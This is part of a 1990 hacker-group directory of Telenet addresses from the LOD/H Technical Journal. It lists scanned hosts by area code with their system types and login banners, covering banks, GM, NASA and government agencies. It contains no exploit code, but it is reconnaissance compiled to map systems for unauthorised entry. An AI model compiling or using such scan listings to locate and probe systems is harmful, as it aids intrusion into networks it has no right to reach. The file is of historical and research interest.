214--TEXAS--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
17 Teleview
20 US Sprint
21 Teleview
* 22
42 DNA Online
* 48
* 53
60 HP-3000
$ 62 PRIME TRUSWL
* 65
71 PRIME UCCC
76 CYBER PCC
77 PRIME UCCC
94a
$ 117 PC Pursuit Dialer (300)
$ 118 PC Pursuit Dialer (1200)
120
131 HP-3000
152 HP-3000
156 HP-3000
* 157
159a C@
160a C@
168 HP-3000
169 HP-3000
176a PRIME UCCC
177 HL053-TRAN
231
233
236a
240 VAX HQAAFES
242 TACL 1>
* 250
* 252
* 253
* 254
* 255
* 256
* 257
* 258
* 259
* 261
* 262
* 263
* 264
* 265
* 266
* 267
* 268
* 269
* 270
* 279
341 PRIME BNW
342 PRIME GCAD..
* 373
* 530
* 531
* 532
* 533
* 534
* 535
* 536
* 537
* 538
* 539
607 HP-3000


215--PENNSYLVANIA--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5 PC Pursuit Dialer (300)
$ 22 PC Pursuit Dialer (2400)
* 30
$ 32 AOS
$ 35 IMS AMERICA
40 VU/TEXT
$ 45 IMS AMERICA
49 Telebase Systems
* 50
* 54
* 60
66 Newsnet
74
92a
$ 112 PC Pursuit Dialer (1200)
121 Towers Perrin Online
* 132
135 VU/TEXT
136 DSS::15B1
137
140 VU/TEXT
$ 148 Weston's Computer Center
$ 156 Telenet Async to 3270
$ 157a Telener Async to 3270
$ 234
235 HP-3000
262 Data Mail
264 ?
265 "
266 "
267 "
268 "
269 PRIME
* 350
* 360
$ 361 HP-3000


216--OHIO--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 30 MRI CICS H0C3
* 31
$ 32 MRI CICS H0C3
$ 34 PRIME SH.US
$ 35
* 51
* 55
* 57
* 59
$ 60 MHP201A
66 Newsnet
$ 74 HP-3000
109a
* 115
$ 120 PC Pursuit Dialer (2400)
* 125
* 134
* 135
* 138
$ 144 U#=
163
* 178


217--ILLINIOS--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
25 UNIX University of Illinois
26 UNIX University of Illinois
$ 35 VAX NCSA VMSA
$ 39 ID
$ 40
$ 41 PRIME SPRFLD


218--MINNESOTA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 38 AOS
$ 39 AOS
* 40
$ 42 AOS
$ 45 AOS
$ 56 AOS
$ 142 AOS
$ 157 AOS


219--INDIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
4 PRIME NODE.1
5 PRIME NODE.2
6 PRIME NODE.4
7 PRIME NODE.5
8 PRIME NODE.8
9 N1127p3 ENTER GROUP NAME>
10 Lincoln National Corp.
* 50


222--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
100 PRIME
301a C@
401a C@


223--CITIBANK--ADDRESSES SCANNED: 0-300/1000-3000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 1
$ 2 VAX CRIS
10 PRIME
* 15
19 HP-3000
26 GS/1 IBISM Electronic Village
30 VAX Citi Treasury Products
31 INVALID FORMAT
32 enter a for astra
* 34
35 VAX Citi Treasury Products
39 HRINFO NETWORK
40 VAX Global Report
46 CICS PPD Communications Network
47 CICS PPD Connunications Network
48 Citibank NY port CBN2
49 Online Manual
50 PRIME
55 PRIME WINMIS
61 VAX Global Report
63 VAX Global Report
65 System/88
$ 68 Citimail II
70 VAX FIG ADMIN CLUSTER
71 Enter Translator Number
91 VAX
$ 92 Citinet
$ 94
$ 95 <<ENTER PASSWORD>>
$ 96 <<ENTER PASSWORD>>
97 Quotdial
98 VAX CMA1
$ 100 VAX
$ 103 <<ENTER PASSWORD>>
$ 104 VAX
175 enter a for astra
$ 176 VAX PBGNY
178 VAX Citibank VAXC
179 VAX Citibank VAXC
$ 180 Decserver
$ 181 Decserver
$ 182 Decserver
* 183
* 184
* 185
* 186
$ 187 Decserver
$ 189 Decserver
193 PRIME
$ 199 RSX-11
201 C/C/M
202 C/C/M
203 C/C/M
204 C/C/M
208 C/C/M
260 VAX
* 1000


224--CITIBANK--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
2 VAX Global Report
5
7 Citibank Test
9 VAX
13
16 PLEASE SIGN ON
17 Citibanking Hong Kong
22
24 Decserver
26 Mexico Babymail
27 Decserver
28 Decserver
36 Citibank Mexico
47 PPD Communications Network
51 "
52 Citibank Mexico
57 VAX
58 Citibank Venesuela
59 Citibank Quito
60 Citibank CBK3
61 Citibank Sidney
62 Citibank Jakarta
63 Citibank Manila
64 Citibank New Zealand
65 Citibank Singapore
66
67
68 Argentina Mail
71 ENTER TRANSACTION ID:
73 Decserver
74 CHANNEL 03/104
76 Cititrak BBS
78 Citibank Hong Kong
79 Citibank New York
81 Citibank Tokyo
82 Citibank Seoul
83 Citibank New York
84 World Corp. Group
85 Citibank Hong kong
86 Citibank Singapore
87 Decserver
88 Citibank Taipei
89 Citibank ICC
90 WANG VS BANCO INTERNAL
91 PRIME
92
93
94 IBM 3270 CSGCOPRO
97 CitiMail-Asia Pacific
98 C/C/M
100 CitiSwitch, New York
101 BMS==>
102 CitiSwitch Hong Kong
103 BRAZILMAIL
104 BMS==>
105 Type .
106 Citibank Panama
107
108 C/C/M
109 Citibank Baharain
110 Citibank Puerto Rico
111
113 Citibank London
114
115
117 Citibank Hong Kong
118 NEWNET BS
119 Decserver
121 NEWNET BS
122 VAX Global Report
125 ENTER TRANSACTION ID:
127 Citibank Jakarta
128 PRIME
129 VAX CitiTreasury Products
130 VAX "
131 Citibank New York
134
137 HP-3000
138
139 VAX I.B.F.S.
140 "
141 HP-3000
145 PRIME
150 Citibank New Jersey
151
154 PRIME
160
161 VAX FIG ADMIN
162 PRIME
163 PRIME
164 PRIME WINMIS
165 GS/1 IBISM Elctronic Village
166 VAX CitiTreasury Products
167 VAX "
168 VAX Global Report
170 Electronic Cash Manager
173 HELP Online User Manager
174 PRIME
175 enter a for astra
176 Decserver
177
178 VAX CRIS
179 Citinet
180 ENTER QUOTDIAL ID:
181 Citimail II N. America
183 PRIME
187 Decserver
188 GS/1 Cititrust WIN
190 HP-3000
191 ENTER TYPE NUMBER
192 HP-3000
193 HP-3000
196 VAX CMA1
197 HRINFO NETWORK
199 CHANNEL 08/017
200 Citibank Baharain
201 CitiMail-Asia Pacific
202 "
203 Citibank Hong Kong
204 LAGB LATINMAIL
205
207 CitiBanking SUC.MONTEVIDEO
213
217
219 Citibank Stockholm
221
222 XENIX
223 VAX Global Report
224 PRIME
229 VAX Global Report
231
501 PRIME ATG
506 IBM Citibank Hong Kong


229--GENERAL MOTORS--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
113 DCIPC
114 %@CTVVAUd@dUYECVGUIied
118 " "
137 VAX
152 VAX
171 (Channel b.h128.001)
172 " "
176 NOS
177 (Channel b.h101.001)
178 (Channel b.h128.001)
179 " "
181 USER NUMBER--
183 USER NUMBER--
184 Division:
185
187 DEC20
219 VM/370
220
226 VAX
310 PRIME
311 IUeASID@CVTTAUD@bhUcAg


301--NARYLAND--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
20 PLEASE ENTER /LOGIN
* 21
24 The Source
26 DNAMD1 Online
28 The Source
31 PRIME NUSA
33 VOS United Communications Corp
38 The Source
* 39
* 43
45 RNN/NGW
* 46
47 The Source
48 The Source
49 The Source
$ 52 PRIME
56 RNN/NGW
57 RNN/NGW
58 PRIME CDA Online Services
* 60a
* 61a
$ 63 PRIME PINET
$ 65 PRIME APHISB
74 (I)nt (D)atapac (T)elenet
* 77
* 78
100 VOS United Communications Corp
102 CYBER Arbitron
103 " "
104 " "
105 " "
106 " "
107 " "
108 " "
109 " "
110 " "
111 " "
112 " "
113 " "
114 " "
115 " "
116 " "
$ 125 VAX
132 ElHill 3
140 VAX
141 USER ID
$ 150 VAX
156 The Source
157 The Source
158 The Source
159 The Source
162 The Source
* 165
$ 167 VAX Manger Support System
$ 68 VAX
170 VOS United Communications Corp
$ 173 ID
$ 175 ID
$ 176 HP-3000
178 CYBER Arbitron
$ 243 PRIME
$ 245 PRIME
$ 246 PRIME
$ 247 PRIME
249 VAX Tamsco
301 PRIME Primecom Network
302 " " "
303 " " "
307 PRIME
330 PRIME Primecom Network
331 " " "
332 " " "
333 " " "
334 " " "
335 " " "
336 VAX
337 Dialcom MHS
341 PRIME Primecom Network
342 " " "
343 " " "
344 " " "
345 " " "
346 " " "
350 " " "
351 " " "
352 " " "
353 " " "
354 " " "
356 " " "
357 " " "
358 " " "
361 " " "
363 " " "
364 " " "
390 " " "
391 " " "
392 " " "
393 " " "
394 " " "
396 " " "
398 " " "
399 " " "
408 The Source
430 The Source
435 The Source
$ 440 INVALID-SW-CHARS
* 441
* 442
* 443
* 444
* 445
* 446
* 447
* 448
* 449
* 450
* 451
* 452
$ 453 VAX
$ 454 PRIME FRED
1001 Campus 2000
1002 Telecom Gold
1004 Telecom Gold
1017 Rev.19
1018 Telecom Gold
1040 VAX British Telecom
1041 " "
1047 " "
1049 " "
1050 " "
1051 " "
1052 " "
1053 " "
1054 " "
1055 " "
1057 " "
1058 " "
1060 UNIX Telecom Gold
1061 " "
1068 " "
1069 " "
1072 Telecom Gold
1073 "
1074 "
1075 "
1076 "
1077 "
1078 "
1079 "
1080 "
1081 "
1082 "
1083 "
1084 "
1085 "
1086 "
1087 "
1088 "
1089 "
1090 "
1200a "
2030 ID
2031 "
2032 "
2033 "


302--DELAWARE--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 ID
* 32
$ 41 (Tymnet clone)


303-COLORADO--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
7 NCAR
8 NCAR
$ 21 PC Pursuit Dialer (2400)
38 PRIME SL
$ 50 AOS
$ 52 PRIME DWRC
$ 54 AOS
$ 57 PRIME DENVER
$ 60 AOS
* 64
* 65
$ 66 AOS
$ 68 AOS
$ 69 AOS
$ 78 AOS
100 enter switch characters
$ 114 PC Pursuit Dialer (300)
$ 115 PC Pursuit Dialer (1200)
120 PRIME SAMSON
$ 130 AOS
131 Petroleum Info Network
$ 138 AOS
140 X29 Password:
$ 145 AOS
$ 146 AOS
$ 149 ID
* 152
$ 154 AOS
$ 155 AOS
$ 156 AOS
$ 157 AOS
$ 158 AOS
$ 159 AOS
$ 168 AOS
$ 169 AOS
$ 172 AOS
$ 176 AOS
$ 177 AOS
* 179
* 200
$ 231 AOS
$ 239 AOS
* 244
* 250
$ 253 AOS
* 256
$ 257 AOS
* 266
314
335 PRIME UDEN01
$ 342 HP-3000
350 VAX
$ 353 AOS
$ 354 AOS
$ 355 AOS
$ 356 AOS
$ 434 AOS
* 463
$ 470 AOS


304--WEST VIRGINIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 AOS
$ 32 ID
* 34
* 41
100 WVNET
130 WVNET


305--FLORIDA--ADDRESSES SCANNED: 0-900

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
4 Martin Marietta
20
22 HP-3000
35 ENTER SWITCH CHARACTERS
* 51
* 52
* 56
63 HP-3000
* 67
* 68
* 69
73 HP-3000
$ 120 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 122 PC Pursuit Dialer (2400)
129 HP-3000
* 135
136
137
138 HP-3000
140
148 VAX
156 VAX EVF
159 VU/TEXT
* 235
* 236
239 VM/370
$ 240 HP-3000
248 VAX
255 VAX
* 262
* 263
$ 268
278 PACKET/74
330a
* 337
$ 338 VAX AIM
$ 345 PRIME MIAMI
* 350
* 351
* 360
* 361
365 Martin Marietta
$ 370 No access to this DTE
371 VAX (In Spanish)
* 433
570
590
623 Telenet Async to 3270
644


312--ILLINOIS--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 24 PC Pursuit Dialer (2400)
34 Your entry is incorrect
$ 35 VTAM/TSO
* 37
41 Your entry is incorrect
42 #
43 #
46 SYSTEM SECURITY STANDARDS
63 PEOPLE/LINK
$ 64 Purdue ISN
$ 65 COMMAND UNRECOGNIZED
70 PEOPLE/LINK
* 71
* 77
* 78
101a
108a
121 enter system id--
131 VM/370
$ 133
135 PEOPLE/LINK
142 HP-3000
$ 146 HP-3000
$ 147 ONLINE
150 Please enter SUBSCRIBERID
$ 158 HP-3000
159 Please enter SUBSCRIBERID
160 PASSWORD
161 "
162 "
163 "
$ 166 ONLINE
$ 170 VAX SKMIC4
219 enter system id--
222 PASSWORD
227 PASSWORD
$ 231 USSMSG02
233 PASSWORD
235 PASSWORD
* 245
247
* 253
* 254
$ 255 Enter host access code:
256 Please LOGIN
258 ID:
* 263
289 Baxter ASAP System
300a WANG VS SREA
301a " "
302a " "
303a " "
304a " "
305a " "
306a " "
307a " "
308a " "
309a " "
310a " "
311a " "
312a " "
313a " "
314a " "
315a " "
316a " "
317a " "
318a " "
319a " "
* 338
* 341
* 354
370 PEOPLE/LINK
373a
374 Information Resources
375 VAX Marketing Fact Book
378 Baxter ASAP System
* 391
* 392
* 394
* 395
* 397
$ 398 MHP201A
400 Baxter ASAP System
401 "
402 "
403 "
404 "
406 COMMAND UNRECOGNIZED
$ 410 PC Pursuit Dialer (300)
$ 411 PC Pursuit Dialer (1200)
* 420
* 421
$ 422 MHP201A
* 425
* 427
* 428
* 431
$ 434 Purdue ISN
$ 435 HP-3000
$ 439 Purdue ISN
* 442
* 469
* 475
* 476
* 477
520 R59X01 login:
521 "
522 "
523 "
524 "
525 "
526 PASSWORD
527 PASSWORD
528 PASSWORD
532 VAX OMNI
534
535
536
548
$ 571
$ 572
$ 575
$ 576
$ 577
$ 580
$ 581
$ 590
$ 591
$ 592
$ 593
$ 594
$ 595
$ 596
$ 597
583
584
586
587
588
589
655 Baxter ASAP System
740 Telenet Async to 3270
741a Telenet Async to 3270
* 759
* 761
* 762
* 763
* 764
* 766
* 767
* 768
* 769
$ 770 Telenet Async to 3270
$ 771a Telenet Async to 3270
$ 772 Telenet Async to 3270
1030 VAX First Options of Chicago
1031 VAX "
1032 VAX "
1033 VAX "
1034 VAX "
1035 VAX "
1036 VAX "
1037 VAX "
1038 VAX "
1112
1127
1130 R52XO1 login:
1131 "
1132 "
1133 "
1134 "
1135 "
1136 "
1137 "
1138 "
1139 "
1140 "
1141 "
1142 "
1143 "
1144 "


313--MICHIGAN--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 24 PC Pursuit Dialer (2400)
25 COMSHARE
$ 30 VAX GVN VAX CLUSTER
37 enter system id--
38 "
40 Autonet
41 Autonet
43 enter system id--
50 enter system id--
61 enter system id--
62 merit:x.25
64 Telenet Async to 3270
65a Telenet Async to 3270
68 (I)nternational (D)atapac
* 75
$ 77 ID
82 NTUSSTB5
83 "
85 enteer system id--
119 PASSWORD
120 "
145 enter your access code?
146 "
148 ENTER YOUR SUBSCRIBERID;
160 PASSWORD
161 "
162 "
164 VU/TEXT
165 enter user ID
172 "
173 VAX IPP
202 merit:x.25
210a
$ 214 PC Pursuit Dialer (300)
$ 216 PC Pursuit Dialer (1200)
* 231
233
239 UNIX GTE
* 245
249
250 HP-3000
252
255 $$50 DEVICE TYPE ID
256 "
* 257
346 ?1040
347 "


314--MISSOURI--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5 PC Pursuit Dialer (2400)
$ 20 PC Pursuit Dialer (1200)
$ 33 AOS
$ 35 AOS
$ 36 AOS
$ 37 AOS
$ 38 AOS
* 39
$ 40 AOS
$ 45 AOS
* 50
* 57
131 MDCIS
132 Type User Name
$ 157 PRIME JEFCTY
$ 179 ID
* 240
* 241
* 242
* 243
* 244
* 245
* 246
* 247
* 248
* 249
* 250
* 251
* 252
* 253


315--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
20 enter system id
$ 32 COMMAND UNRECOGNIZED
$ 50 enter terminal type
$ 130 ID
134 enter system id
135 "
136 "
$ 137 GTE CAMILLUS NY
$ 149 GTE CAMILLUS NY
150 GTE CAMILLUS NY
151 "
154
155
156 5294 Controller
157a 5294 Controller


317--INDIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 ID
* 31
32 PRC ACF/VTAM
34 PRC ACF/VTAM
41


318--LOUISIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
* 57


321--SPAN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
104 NASA Packet Network
150 PRIME
$ 160 VAX NASA/MFSC
1030 VAX MIPS10
1036 VAX US GOVERNMENT VAX
1056 PRIME
2023 PRIME
3035 VAX FLYBOY
4027a ALPHA 5
* 7034
7036 LUT 3.2>
$ 7055 VAX
7064 PRIME


334--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 100 National Computer Center
$ 102 "
$ 103 Enter Terminal id?
$ 130 NARDAC
$ 131 NARDAC
* 200
$ 500
* 560


335--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 12
* 13
* 110
* 111
* 120
* 121
* 122
* 123
* 124
* 210


336--UNKNOWN--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 21 VAX USDA
$ 22 VAX "
$ 40 AOS
159 VAX
$ 165 VAX VSFCA
173 Unisys Telcom
174 "
179 "
* 180
$ 181
$ 182 FCCC
* 183
$ 185 IVeASID@CVTTAUD@bhUeAg
$ 200 AOS
$ 240 PRIME
$ 250 AOS
$ 260 AOS
* 604


337--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 10a
$ 15a
* 100
* 101
$ 110 V28048DA
$ 120 AOS
* 200
* 201
* 202
* 203


343--BURROUGHS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
190 BURROUGHS


401--RHODE ISLAND--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 42 ID
* 50
612 Modem City


402--NEBRASKA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
40 ID
* 52
55 Dynix
* 56
$ 60
64a


404--GEORGIA--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 22 PC Pursuit Dialer (2400)
* 33
$ 36 AOS
$ 37 AOS
* 40
* 47
$ 72 ID
$ 113 PC Pursuit Dialer (300)
$ 114 PC Pursuit Dialer (1200)
$ 124
* 127
$ 128
$ 130
* 136
* 175
* 230


405--OKLAHOMA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
19
$ 20
* 32
* 33
34
45 Hertz
46 C@


406--MONTANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 32 AOS
$ 33 AOS
$ 37 AOS
$ 44 AOS
$ 45 AOS
$ 46 AOS
$ 47 AOS
$ 48 AOS
$ 51 AOS
$ 52 AOS
$ 53 AOS
$ 58 AOS
$ 61 AOS
$ 62 AOS
$ 63 AOS
$ 64 AOS
$ 65 AOS
$ 75 AOS
* 125
$ 131 AOS
$ 132 AOS
$ 133 AOS
* 140
* 142
* 145
* 148
$ 150 AOS
$ 155 AOS
$ 157 AOS
$ 158 AOS
$ 159 AOS
$ 161 AOS
$ 162 AOS
$ 163 AOS
$ 176 AOS
$ 178 AOS


408--CALIFORNIA--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 21 PC Pursuit Dialer (2400)
$ 38 AOS
$ 41 AOS
* 49
* 53
58a
62 TACL1>
* 76
84a
$ 110 PC Pursuit Dialer (300)
$ 111 PC Pursuit Dialer (1200)
121 HP-3000
126a
$ 133 UNIX
$ 135 SCS-SALES
* 149
154 PRIME GREGOR
$ 159 VAX
$ 174 AOS
* 175
235 Global Weather MU2
238 UNIX
$ 257 VAX MATRA DESIGN
* 260
* 261
264 Portal
* 267
* 268
* 271
274 BBB Version 20
280a
304 Call:
311 AMDAHL Network
312 CCC110A
313 AMDAHL Network
314 "
315 "
$ 342 UNIX
$ 344 VAX ANDO
346 UNIX
$ 349 PCI (Tymnet clone)
352
$ 357 PCI (Tymnet clone)
$ 358 "
$ 359 "
* 371
$ 375 PCI (Tymnet clone)
$ 376 "
$ 377 "
378 UNIX Sunlink
434 COMMAND UNRECOGNIZED
435
$ 439 PCI (Tymnet clone)
$ 440 "
$ 444 HP-3000
$ 445 VAX LAUREL
$ 457 HP-3000
$ 461 AOS
$ 462 AOS
$ 463 AOS
* 468
$ 469 AOS
* 479
* 530
* 531
* 532
$ 534 HP-3000
$ 537 HP-3000
$ 538 HP-3000
* 560
$ 561 AOS
* 562
* 563
* 564
* 565
* 566
* 567
$ 568 AOS
$ 569 AOS
* 570
* 571
* 572
* 573
* 574
$ 610 HP-3000
619 HP-3000
* 620
627 Fujitsu America


410--RCA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
0 RCA


412--PENNSYLVANIA--ADDRESSES SCANNED: 0-800

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
33 Enter Usercode:
$ 34 LORD Corporation
$ 35a Telenet Async to 3270
42 Federated Edge
43 "
47 Enter Logon
48 "
49 "
51 "
52 "
55 COMMAND UNRECOGNIZED
61
63
67 enter terminal id
* 68
79 Federated Edge
117 VAX
* 122
276 COMMAND UNRECOGNIZED
277 "
278 "
279 "
* 331
340 Mellon Bank
341 C@
342 COMMAND UNRECOGNIZED
349 *** ENTER LOGON
352 "
354 VAX
355 C@
360 VAX
430
431
671 Carnegie-Mellon MICOM-B


413--MASSACHUSETTS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 21 TW81


414--WISCONSIN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 31 AOS
$ 34 AOS
$ 36 AOS
* 38
$ 46 PRIME SYSU
49 MMISC
60 MGIC
81a
* 120
$ 131 AOS
$ 132 AOS
$ 134 AOS
$ 136 AOS
$ 137 AOS
* 151
153
189a


415--CALIFORNIA--ADDRESSES SCANNED: 0-1300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5 PC Pursuit Dialer (2400)
7 HP-3000
$ 11 PC Pursuit Dialer (1200)
20 Dialog
27 Stanford Data Center
29 Stnaford U. Hospital
$ 34 AOS
38 HP-3000
* 39
$ 45 PRIME CESSF
48 Dialog
49 "
53 VAX
$ 106 Telenet Async to 3270
$ 108 PC Pursuit Dialer (300)
$ 109 PC Pursuit Dialer (1200)
$ 130 AOS
* 138
* 139
* 142
* 143
* 144
* 145
$ 157 VAX MENLO
158 ComMail Esprit de Corp
$ 164 AOS
167 PRIME VESTEK
* 174
* 178
$ 215 PC Pursuit Dialer (300)
$ 216 PC Pursuit Dialer (1200)
$ 217 PC Pursuit Dialer (2400)
$ 224 PC Pursuit Dialer (2400)
238 GEONET
239 Telenet Async to 3270
242 VAX
* 252
269 LUT Rel 3.2>
$ 333 AOS
$ 335 AOS
338 Telenet Async to 3270
342 Dialog
343 Telenet Async to 3270
345 SBE Inc.
* 348
* 370
379 VAX
$ 431 AOS
$ 434 AOS
$ 436 AOS
$ 437 AOS
$ 438 AOS
452 Telmar Intl Network
* 460
* 468
$ 470
$ 471
$ 541 AOS
$ 542 AOS
$ 543 AOS
$ 544 AOS
$ 545 AOS
* 546
$ 547 AOS
$ 549 AOS
* 551
* 560
* 571
572 VAX
575 VAX SPRINT
576
578
672 Telenet Async to 3270
698
$ 730 AOS
$ 731 AOS
$ 732 AOS
$ 733 AOS
* 734
* 735
* 736
* 737
* 738
* 739
* 740
* 741
780
827
1030 PRIME
1036 OVL 111 44 IDLE
1037
1038
1055
1063
1200 enter switch characters
1201 "
1202 "
1205 "


419--OHIO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 35


422--WESTINGHOUSE--ADDRESSES SCANNED: 0-1125

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
1 PRIME
2
102 ARDM1
104 HP-3000
106 GS/1
114 west pgh tcc
115 corp info service
121 AOS
126 tcc1
127 csc2
130 PRIME
132 UNIX
135 UNIX
140
141 VAX
180 MHP1201I
182 "
183 "
185 "
187 "
194 Commtex CX-80
221
222 HP-3000
223 VAX
229


424--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
100
101
102
103
104
114
115
116
122
123
129
130

==============================================================================

End of First Half of LOD/H Telenet Directory, Rev. #5
==============================================================================
The LOD/H Technical Journal, Issue #4: File #09 of 10

The Legion Of Hackers Present:
Updated: Telenet Directory
Part B: Addresses 501XXX to 919XXX
Revision #5 Last Updated: 2/10/90
(Includes Mnemonic Host Names)

Scanned and Written by:
Erik Bloodaxe


501--ARKANSAS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 AOS
* 32
* 38
$ 44 PRIME LROCK


502--KENTUCKY--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 50
* 58
* 60
* 61


503--OREGON--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 30 AOS
$ 31 AOS
$ 32
$ 36 AOS
$ 37 AOS
$ 39 AOS
$ 40 AOS
* 41
$ 45 AOS
$ 46 AOS
$ 47 AOS
$ 48 AOS
$ 49 AOS
$ 52 AOS
$ 56 AOS
$ 60 AOS
$ 63 AOS
$ 68 AOS
$ 71 AOS
75 PLEASE SIGN ON
$ 76 AOS
$ 77 AOS
$ 78 AOS
120
$ 130 AOS
$ 132 AOS
$ 134 AOS
$ 136 AOS
$ 137 AOS
$ 138 AOS
$ 141 AOS
$ 142 AOS
* 143
$ 147 AOS
$ 149 AOS
$ 150 TEKTRONIX 100
$ 151 AOS
$ 152 AOS
$ 154 AOS
$ 156 AOS
* 162
$ 167 AOS
$ 168 AOS
$ 169 AOS
$ 170 AOS
$ 174 AOS
$ 177 AOS
$ 200 AOS
* 228
* 229
$ 230 AOS
* 232
* 237
$ 238 AOS
$ 239 AOS
* 240
$ 241 AOS
$ 242 AOS
$ 243 ID
$ 250 AOS
$ 255 AOS
$ 274 AOS
$ 277 AOS
$ 278 AOS
$ 279 AOS
$ 330 AOS
$ 331 AOS
$ 332 AOS
$ 334 AOS
$ 335 AOS
$ 336 AOS
$ 338 AOS
$ 339 AOS
$ 340 AOS
$ 341 AOS
$ 342 AOS
$ 345 AOS
$ 349 AOS
$ 350 AOS
$ 351 AOS
$ 353 AOS
$ 355 AOS
$ 357 AOS
$ 360 AOS
$ 370 AOS
$ 371 AOS
$ 432 AOS
$ 440 AOS
613 UNIX sequent


504--LOUISIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 22
$ 31 ID
$ 32 AOS
$ 33 AOS
$ 34 AOS
* 38
* 44
* 116
* 117
